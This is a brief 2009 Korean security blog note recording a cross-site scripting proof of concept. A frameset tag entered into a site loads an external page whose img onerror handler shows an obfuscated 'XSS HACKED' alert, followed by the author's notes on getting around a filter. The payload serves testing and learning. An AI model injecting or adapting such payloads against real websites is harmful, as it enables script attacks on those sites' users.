[XSS] <frameset><frame src=URL></frameset>

해킹&보안/WEB 해킹 2009/05/20 18:35
ㅇ 사이트 입력
   <frameset><frame src=http://youngsam.kr/xss></frameset>

http://youngsam.kr/xss 의 내용
    <img src="" onerror="alert(String.fromCharCode(88,83,83,32,72,65,67,75,69,68));" height=0 width=0>

ㅇ = alert('XSS HACKED)')

ㅇ 우회 방안 고민중 - frameset 앞에 <body>, "aa" 등 들어갈 경우 실패
<html>
<head><title>xss</title></head>
<frameset><frame src=http://youngsam.kr/xss></frameset>
</html>
2009/05/20 18:35 2009/05/20 18:35
No trackbacks, No comments.

Trackback Address :: 이 글에는 트랙백을 보낼 수 없습니다

1 ... 1623 1624 1625 1626 1627 1628 1629 1630 1631 ... 2063